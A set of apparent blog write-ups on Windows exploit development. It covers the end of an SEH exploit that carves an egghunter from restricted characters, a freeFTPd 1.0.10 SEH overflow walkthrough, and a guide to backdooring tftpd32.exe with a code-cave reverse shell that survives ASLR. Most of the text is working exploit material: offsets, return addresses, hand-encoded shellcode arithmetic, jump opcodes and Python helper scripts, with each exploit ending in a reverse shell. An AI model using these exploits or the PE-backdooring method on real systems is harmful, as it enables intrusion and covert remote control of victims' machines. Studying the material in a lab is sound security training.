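# PUSH ESP (54), POP EAX (58), ADD AX, imm16 (66 05 lo hi),
# PUSH EAX (50), POP ESP (5C).
# ADD AX only touches the low 16 bits, which is enough here because
# 0xF574 + delta does not overflow 16 bits.
align_esp = (
    b"\x54\x58"
    + b"\x66\x05" + delta.to_bytes(2, "little")
    + b"\x50\x5c"
)

if __name__ == "__main__":
    print(delta, hex(delta), align_esp.hex())
```

None of the eight bytes falls in the restricted set, which matches the observation above.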

We execute the following instructions and we can see that our ESP now points to 0012FB8D


Again, we update our POC with our initial ESP realignment which will be the beginning of our egghunter shellcode


With our ESP aligned to where we want it to point....we can start carving out our egghunter shellcode.

Here's the original egghunter shellcode broken down into 4-byte chunks

#original egg hunter shellcode
\x66\x81\xcA\xFF
\x0F\x42\x52\x6A
\x02\x58\xCD\x2E
\x3C\x05\x5A\x74
\xEF\xb8\x54\x30
\x30\x57\x8b\xFA
\xAF\x75\xea\xAF
\x75\xE7\xFF\xE7

We will be using the EAX register to carve out the egghunter. Note that we need to zero out EAX first before we execute SUB instructions. We start from the last 4 bytes and work our way up.

zero_out_eax = "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
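Why these ten bytes zero out EAX: they are two AND EAX, imm32 instructions (opcode 25) whose masks share no set bits, so whatever EAX held before, nothing survives both ANDs. A short check, using only the bytes shown above:

```python
import struct

zero_out_eax = b"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"

# Each instruction is opcode 0x25 followed by a little-endian dword.
(mask1,) = struct.unpack("<I", zero_out_eax[1:5])
(mask2,) = struct.unpack("<I", zero_out_eax[6:10])

if __name__ == "__main__":
    print(hex(mask1), hex(mask2), hex(mask1 & mask2))
    # Any starting value of EAX ends up as zero.
    print(hex(0xDEADBEEF & mask1 & mask2))
```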

This whole carving thing is straight black magic...it never ceases to amaze me.

#\x75\xe7\xff\xe7
#using hex/dword in windows calc
#0 - E7FFE775 = 1800 188B
#7950 5109 + 7950 5109 + 255F7679 = 1800 188B
#0 - 7950 5109 - 7950 5109 - 255F 7679 = E7FF E775


These 4 bytes are produced by executing a few SUB instructions on EAX; the result is then pushed to the stack, so the decoded bytes end up at the address ESP points to.
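To make the mechanics concrete, here is a rough sketch that turns one set of SUB operands into opcodes. The helper name carve is hypothetical; it uses the standard encodings 2D (SUB EAX, imm32) and 50 (PUSH EAX) and assumes EAX has already been zeroed.

```python
import struct

MASK = 0xFFFFFFFF


def carve(target: int, subs: tuple) -> bytes:
    """Encode SUB EAX, imm32 for each operand, followed by PUSH EAX.

    Assumes EAX is zero beforehand. Raises ValueError if the operands do
    not produce `target` under 32-bit wraparound.
    """
    eax = 0
    for value in subs:
        eax = (eax - value) & MASK
    if eax != target:
        raise ValueError(f"operands give {eax:08X}, wanted {target:08X}")
    body = b"".join(b"\x2d" + struct.pack("<I", value) for value in subs)
    return body + b"\x50"


if __name__ == "__main__":
    # Last egghunter chunk, \x75\xe7\xff\xe7, read as a little-endian dword.
    block = carve(0xE7FFE775, (0x79505109, 0x79505109, 0x255F7679))
    print(len(block), block.hex())
```

Each 4-byte chunk costs 16 bytes of encoded instructions this way, plus the 10 bytes needed to zero EAX before the next chunk, which is why address space gets tight so quickly.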



We will be doing this for the other 28 bytes

#\xaf\x75\xea\xaf
#using hex/dword in windows calc
#0 - AFEA75AF = 5015 8A51
#71094404 + 71094404 + 6E03 0249 = 5015 8A51
#0 - 71094404 - 71094404  - 6E03 0249 = AFEA75AF



#\x30\x57\x8b\xfa
#using hex/dword in windows calc
#0 - FA8B 5730 = 0574 A8D0
#55093131 + 55093131 + 5B62 466E = 0574 A8D0
#0 - 55093131 - 55093131 - 5B62 466E = FA8B 5730


#\xef\xb8\x54\x30
#using hex/dword in windows calc
#0 - 3054 B8EF = CFAB 4711
#56316666 +56316666  + 2348 7A45 = CFAB 4711
#0 - 56316666  - 56316666  - 2348 7A45 = 3054 B8EF



At this point, we have successfully carved out 16 bytes of our egghunter shellcode (its last four chunks).

Note that we are getting close to our second EB 83 jmp…we will need to jump over this to get to the next 127 bytes of address space

I made a mistake on the ESP realignment that resulted in wasted address space. ESP should have pointed to the end of our 41s, because the stack grows toward lower addresses with every push.

This means we need ESP to be pointing at address 0012FBAC



Adjusted ESP alignment


This gives us about 32 extra bytes of address space….every byte counts!

We finish up the first 128 bytes by adding the first half of our zero_out_eax instructions and a short jump of 10 bytes to get over the second EB 83 (I think we could also have looped around and simply overwritten the first 16 bytes of our egghunter shellcode).



Our jump short brings us from address 0012FB2F to 0012FB3B and we successfully get over the second EB 83



Now we continue encoding the rest of our egghunter shellcode


#\x3c\x05\x5a\x74
#using hex/dword in windows calc
#0 - 745A053C = 8BA5 FAC4
#41214433 + 41214433 + 0963 725E = 8BA5 FAC4
#0 - 41214433 - 41214433 - 0963 725E = 745A053C


#\x02\x58\xcd\x2e
#using hex/dword in windows calc
#0 - 2ECD5802 = D132 A7FE
#657F3165 + 657F3165 + 06344534 =  D132 A7FE
#0 - 657F3165 - 657F3165 - 06344534 = 2ECD5802
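The hand calculations done in Windows calc can be re-checked in one pass. The sketch below only verifies the arithmetic of the six operand sets written out in this post; it does not check them against the restricted characters.

```python
MASK = 0xFFFFFFFF

# target dword -> the three SUB operands from the worked notes above
CARVED = {
    0xE7FFE775: (0x79505109, 0x79505109, 0x255F7679),
    0xAFEA75AF: (0x71094404, 0x71094404, 0x6E030249),
    0xFA8B5730: (0x55093131, 0x55093131, 0x5B62466E),
    0x3054B8EF: (0x56316666, 0x56316666, 0x23487A45),
    0x745A053C: (0x41214433, 0x41214433, 0x0963725E),
    0x2ECD5802: (0x657F3165, 0x657F3165, 0x06344534),
}


def carved_value(subs) -> int:
    """Value left in EAX after subtracting each operand from zero."""
    eax = 0
    for value in subs:
        eax = (eax - value) & MASK
    return eax


results = {target: carved_value(subs) == target
           for target, subs in CARVED.items()}

if __name__ == "__main__":
    for target, ok in results.items():
        print(f"{target:08X}", "ok" if ok else "MISMATCH")
```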



Finally, we hit our last 4 bytes



That completes our egghunter shellcode…with literally 6 bytes left to spare with our address space

To test if our egghunter can find our egg, we add our egg "T00W" to the beginning of our Ds…and see if we can find it

...and we are successful. We found our Ds address space.
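For reference, the egg is simply the immediate value loaded by the MOV EAX (B8) instruction inside the egghunter. The sketch below pulls it out of the two chunks that contain it. The doubled marker is my reading of the two SCASD (AF) instructions at the end of the hunter, which compare the tag twice in a row; treat it as an assumption rather than something taken from the POC.

```python
# Two consecutive 4-byte chunks from the egghunter listing.
chunk = bytes.fromhex("efb85430" "30578bfa")

# B8 is MOV EAX, imm32; the four bytes after it are the egg.
start = chunk.index(0xB8) + 1
egg = chunk[start:start + 4]

# Assumption: the tag is placed twice, back to back, in front of the payload.
marker = egg * 2

if __name__ == "__main__":
    print(egg, marker)
```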



0x7 - Shellcode time!

I created a calc shellcode to see if we are able to execute a payload.


We go through our egghunter and add a breakpoint right before the jmp edi instruction and we can see that edi points to the beginning of our calc shellcode



Everything looks good. However, our shellcode keeps crashing the program instead of spawning calc.exe.

After some research, it looks like ESP has to be realigned.

We point ESP at the address held in EDX, then align it:

PUSH EDX
POP ESP
AND ESP, 0xFFFFFFF0           ----> clears the low 4 bits, making ESP divisible by 16 (and therefore by 4)
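The effect of the AND mask is easy to see in isolation: FFFFFFF0 clears the low four bits, which rounds the value down to a multiple of 16 (and so also of 4). A tiny sketch, using addresses from earlier in this post purely as sample inputs:

```python
def align_down(value: int, mask: int = 0xFFFFFFF0) -> int:
    """Clear the low bits of `value`, as AND ESP, 0xFFFFFFF0 does."""
    return value & mask


if __name__ == "__main__":
    for esp in (0x0012FB8D, 0x0012F574):
        aligned = align_down(esp)
        print(hex(esp), "->", hex(aligned), aligned % 16 == 0)
```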




I update the shellcode to a reverse shell…pop the exploit one more time and we get a reverse shell





Final POC in my GitHub.

Thanks for reading!

freeFTPd-1.0.10 SEH Based Buffer Overflow

Kali Linux
Windows Vista
freeFTPd 1.0.10

Original Author, POC, and vulnerable software: https://www.exploit-db.com/exploits/27747


~~~~~~//******//~~~~~~

Vulnerable program:




Initial Proof-of-Concept 


...and we get our initial crash where our SEH handler and nSEH have been overwritten with 41s.



Calculating the offset values

As usual, we use Metasploit's pattern_create.rb and pattern_offset.rb
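For readers without Metasploit at hand, the idea behind the two scripts can be sketched in Python. This mimics the familiar Aa0Aa1Aa2... pattern style and is not the Metasploit implementation; the function names are borrowed for readability only.

```python
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length: int) -> str:
    """Build a cyclic pattern in the Aa0Aa1Aa2... style."""
    pieces = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(pieces) * 3 >= length:
            break
        pieces.append(upper + lower + digit)
    return "".join(pieces)[:length]


def pattern_offset(value: int, length: int = 8000) -> int:
    """Offset of a 32-bit value as read from a register, or -1 if absent.

    The value is converted to little-endian bytes first; it must consist
    of ASCII bytes, as every value taken from the pattern does.
    """
    needle = value.to_bytes(4, "little").decode("ascii")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(12))
    print(pattern_offset(0x41326141))
```

Whatever four bytes end up in nSEH and the SEH handler after the crash are passed to the offset lookup, which gives the distance from the start of the buffer.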




We update our POC with the following offset values


...and we verify that we hit the correct offset values as shown with the Cs and Bs


POP-POP-RET 


Since this is an SEH-based buffer overflow, we will, as usual, need a POP-POP-RET address.

I am using mona.py to find this address.

Also, note that we need an address from a module that has SafeSEH and ASLR disabled.

We will use address 0x0041B865



Again, we update our POC with our SEH Handler redirect address


We send our exploit up and we have successfully redirected code execution as we hit our POP-POP-RET address.


We follow the POP-POP-RET and we hit our nSEH, which is right below our As

Note: We currently do not see our Ds.


...however, if we scroll further down, we can see that our Ds are still loaded in memory. We just need to find them...aka egghunter.


First Jump

Since our first jump is limited to the 4 bytes of nSEH, we will do a 2-byte reverse short jmp

EB 80, or jmp short backwards 128 bytes.

We update our nSEH with EB 80 and add 2 NOPs (not necessary) to complete the 4 bytes.
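Put together, the 8 bytes that overwrite the SEH record look like the sketch below. The layout (nSEH first, handler address second) is the standard one for SEH overwrites; the variable names are mine and not taken from the POC.

```python
import struct

nseh = b"\xeb\x80" + b"\x90\x90"        # JMP SHORT with 0x80, padded with two NOPs
seh = struct.pack("<I", 0x0041B865)     # POP-POP-RET address, little-endian

# The displacement byte is signed: 0x80 decodes to -128, counted from the
# end of the 2-byte jump, so we land 126 bytes before the start of nSEH.
(displacement,) = struct.unpack("b", nseh[1:2])

record = nseh + seh

if __name__ == "__main__":
    print(displacement, record.hex())
```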



We fire up the POC one more time, take the pop-pop-ret, and hit our first jump



Restricted characters 


After going through all 256 byte values, we found that 0x0a is the only restricted character
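The usual way to run this test is to send every byte value, dump the buffer from the debugger, and compare. A minimal sketch of both halves follows; the helper first_corruption is hypothetical, and the dumped bytes would have to be copied out of Immunity by hand.

```python
BAD = {0x0A}  # restricted characters found so far

# Every byte value except the known bad ones, in ascending order.
test_bytes = bytes(b for b in range(0x100) if b not in BAD)


def first_corruption(sent: bytes, dumped: bytes):
    """Index of the first byte that differs, or None if everything matches.

    If the dump is shorter than what was sent, the truncation point is
    returned, since a cut-off buffer also points at a bad character.
    """
    for index, (s, d) in enumerate(zip(sent, dumped)):
        if s != d:
            return index
    if len(dumped) < len(sent):
        return len(dumped)
    return None


if __name__ == "__main__":
    print(len(test_bytes))
    print(first_corruption(b"\x01\x02\x03", b"\x01\x02"))
```

Each time a mismatch shows up, the offending byte is added to BAD and the test is repeated until the dump matches.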

So far, we have accomplished the following:

1. Successfully crash the program and overwrite the SEH and nSEH
2. Calculated the offset values
3. Found POP-POP-RET address
4. Completed the first jump from nSEH which allows 127 bytes of address space


Egg...hunting!


Reminder...you can create an egghunter using mona.py


Note: I am using a slightly different egghunter shellcode.

We update our POC with our egghunter shellcode and add the egg in front of our Ds



Send the exploit up...take the first jump (EB 80) and we land on our NOP sled.

If we scroll down, our egghunter is right below the NOP sled.

We let the egghunter execute while adding a breakpoint at JMP EDI to check the value of EDI.

Here we can see that we have successfully located our egg...all that we need to do now is add our reverse shellcode right after our egg.


At this point we are ready to add our reverse shell





Portable Executable (PE) backdooring and Address Space Layout Randomization (ASLR)

This post goes over how to backdoor a Windows executable. The intent is to show how a Windows PE can be hijacked to run a reverse shell while still maintaining its original functionality. We will also deal with ASLR, a security feature that randomises the base address of executables/DLLs and the positions of other memory segments such as the stack and heap. This prevents exploits from reliably jumping to a certain function or piece of code.

This is why you shouldn't trust any executable that you introduce to your system without verifying its source or checksum.

References:

Address Space Layout Randomization (ASLR): https://en.wikipedia.org/wiki/Address_space_layout_randomization  

Executables:
tftpd32.exe - a free, open-source TFTP server that also includes a variety of other services, including DHCP, DNS, and even syslog, and functions as a TFTP client as well
PsExec.exe - is a command-line tool that lets you execute processes on remote systems and redirect console applications' output to the local system so that these applications appear to be running locally. 

Tools:

Immunity Debugger (http://debugger.immunityinc.com/ID_register.py) 
LordPE (http://www.malware-analyzer.com/pe-tools) 
XVI32 (http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm)

~~~~~~~~~//*******//~~~~~~~~~

0x0 - Adding a New Section...Code Cave

There are basically two (or more?) ways to get a code cave: (1) find available address space and (2) add a new executable section.

"The concept of a code cave is often employed by hackers and reverse engineers to execute arbitrary code in a compiled program. It can be a helpful method to make modifications to a compiled program in the example of including additional dialog boxes, variable modifications or even the removal of software key validation checks. Often using a call instruction commonly found on many CPU architectures, the code jumps to the new subroutine and pushes the next address onto the stack. After execution of the subroutine a return instruction can be used to pop the previous location off of the stack into the program counter. This allows the existing program to jump to the newly added code without making significant changes to the program flow itself."

(1) Finding a code cave using backdoor-factory

(2) Using LordPE to add a new executable section.


For this blog, we will add a new section. As seen above, I added a section with a virtual size of 1000 and a raw size of 400. Also note that the virtual offset is 0004B000, as we will need this value to calculate the Relative Virtual Address (RVA). Since ASLR is enabled, we will use RVAs in order to do our jumps and address redirections dynamically.

0x1 - Entry point and New Section address

Using Immunity Debugger, we get the address of the new section (from here on, this will be called the code cave)

We can see that the address currently points to 010AB000. However, the 2 higher bytes of the address are irrelevant due to ASLR.


We can see the entry point once we open up tftpd32.exe in Immunity Debugger and check the memory map. We will be hijacking the first instruction to make the jump to our code cave. Also, note that we will need to reintroduce these two instructions after the backdoor.


If ASLR was not enabled, we could simply have done a jmp 010AB000. Since it is, we need to do some calculations to always hit the code cave regardless of where it gets loaded.
To calculate the RVA, we will need the virtual offset and the entry point.



4B000 (VOffset) - 1208C (EntryPoint) = 38F74. This means that we will do a jmp 38F74.

Using nasm_shell.rb, we generate the following opcodes.


Our first instruction will be updated with E9 6F8F0300 which will do a jump to our code cave.
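The same bytes can be derived by hand. A near JMP (E9) stores the distance from the end of the 5-byte instruction to the target, which is why the encoded value is 38F6F (38F74 minus 5). A small sketch with a hypothetical helper name:

```python
import struct


def rel32_branch(opcode: int, src_rva: int, dst_rva: int) -> bytes:
    """Encode a 5-byte near JMP (0xE9) or CALL (0xE8) from src_rva to dst_rva."""
    # rel32 is measured from the instruction that follows the branch.
    rel = (dst_rva - (src_rva + 5)) & 0xFFFFFFFF
    return bytes([opcode]) + struct.pack("<I", rel)


ENTRY_POINT = 0x1208C   # RVA of the hijacked instruction
CODE_CAVE = 0x4B000     # virtual offset of the new section

jump_to_cave = rel32_branch(0xE9, ENTRY_POINT, CODE_CAVE)

if __name__ == "__main__":
    print(jump_to_cave.hex())
```

Because only the distance is encoded, the same five bytes keep working whatever base address ASLR picks.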


...if we reload the program, ASLR kicks in as we can see the higher 2 bytes have changed. The same opcodes but different address.


We take the jump and it lands us at the beginning of our code cave.


0x2 - Backdoor/Reverse Shell Code

Once in our code cave, we will add a Metasploit reverse shellcode

We will create the payload in hex format and binary copy it to the program using immunity debugger.


Before the reverse shell can be copied, all the registers and flags have to be saved, which can be done with the PUSHAD and PUSHFD instructions. This is needed to maintain the integrity of the original program execution.


Once reverse shellcode is added, registers and flags are restored to their original state using POPFD and POPAD. However before that, we need to adjust the value of ESP to point it to the original stack/ESP value. 

In my case, here are the ESP values

Before shellcode: 0025F908
After shellcode: 0025F70C


We will need to add 1FC to the ESP to align it, then execute the POPFD and POPAD instructions to restore the registers and flags
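The adjustment is just the difference between the two ESP readings. The sketch below also shows how ADD ESP, 0x1FC is normally encoded (81 C4 followed by a 32-bit immediate); that encoding is the standard one and is not copied from the patched binary.

```python
esp_before = 0x0025F908   # ESP right before the shellcode runs
esp_after = 0x0025F70C    # ESP right after the shellcode

delta = esp_before - esp_after

# ADD ESP, imm32 -> 81 C4 followed by the little-endian immediate
add_esp = b"\x81\xc4" + delta.to_bytes(4, "little")

if __name__ == "__main__":
    print(hex(delta), add_esp.hex())
```

The absolute ESP values will differ from run to run, but the difference depends only on what the shellcode pushes, so it has to be measured once per payload.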


At this point, if we add a breakpoint at the end of our shellcode and run the program...we should get a reverse shell to our Kali netcat listener.

As you can see, we have successfully hijacked code execution and redirected it to our code cave containing our reverse shellcode.

0x3 - Restoring Original Program Instructions

Remember the two instructions at the entry point before they were hijacked? We now need to restore them so the program can run as intended.


Keep in mind that we are still dealing with ASLR, which means we will need to calculate the RVA once again.

0096 BF15 - 0095 0000 = RVA 1 BF15 (this will be our CALL RVA_1 BF15) (additional offset by 10000)

0096 2091 - 0095 0000 = RVA 1 2091 (this will be our JMP RVA_1 2091)  (additional offset by 10000)


At address 010AB169 or RVA 4B169 (virtual offset + 169)

 

RVA_4B169 - RVA_1 BF15 



At address 010AB16E or RVA 4B16E (virtual offset + 16E)


RVA_4B16E- RVA_1 2091
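As a cross-check of the two subtractions, the relative operands can be computed in Python. The post subtracts the RVAs directly; the encoded value additionally accounts for the 5-byte length of each instruction and is negative because both targets sit below the code cave. This is a sketch under the assumption that both instructions are 5-byte near branches (E8 for CALL, E9 for JMP), which fits the two addresses being 5 bytes apart.

```python
import struct


def rel32(src_rva: int, dst_rva: int) -> int:
    """32-bit relative operand for a 5-byte CALL/JMP at src_rva."""
    return (dst_rva - (src_rva + 5)) & 0xFFFFFFFF


# CALL at RVA 4B169 back to RVA 1BF15
call_bytes = b"\xe8" + struct.pack("<I", rel32(0x4B169, 0x1BF15))

# JMP at RVA 4B16E back to RVA 12091
jmp_bytes = b"\xe9" + struct.pack("<I", rel32(0x4B16E, 0x12091))

if __name__ == "__main__":
    print(call_bytes.hex())
    print(jmp_bytes.hex())
```

If the opcodes shown by the assembler differ from these, the most likely cause is a different instruction address than the two assumed here.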




Add these instructions or opcodes as shown below:


And we are done...somewhat.

0x4 - WaitForSingleObject

Our reverse shell calls the WaitForSingleObject function with a timeout taken from ESI, which is -1 (wait forever). As a result, tftpd32.exe will not continue executing until we exit the reverse shell. This means that we need to change the ESI value from -1 to 0.

We will trace code execution in Immunity Debugger using the 'Trace Over' command.

Line 5 has a DEC ESI instruction, which makes ESI = FFFFFFFF. This means all we need to do is cancel the DEC ESI instruction (replacing it with a NOP works just fine)!
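The same patch could also be applied to the raw shellcode before pasting it into the code cave. The sketch below assumes the payload contains the byte sequence 4E 56 46 (DEC ESI, PUSH ESI, INC ESI) in front of the WaitForSingleObject call. That is an assumption about the payload, so check the trace first; the sample bytes are made up for illustration.

```python
def nop_dec_esi(shellcode: bytes) -> bytes:
    """Replace the DEC ESI in a 'DEC ESI / PUSH ESI / INC ESI' run with a NOP."""
    pattern = b"\x4e\x56\x46"          # DEC ESI ; PUSH ESI ; INC ESI
    index = shellcode.find(pattern)
    if index == -1:
        raise ValueError("sequence not found, patch by hand in the debugger")
    # Only the first byte of the run changes, so the length stays the same.
    return shellcode[:index] + b"\x90" + shellcode[index + 1:]


if __name__ == "__main__":
    sample = b"\x41\x41\x4e\x56\x46\x42"   # made-up bytes, not a real payload
    print(nop_dec_esi(sample).hex())
```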




We should now be able to successfully execute the program while it also simultaneously sends a reverse shell to Kali.



Thanks for reading.
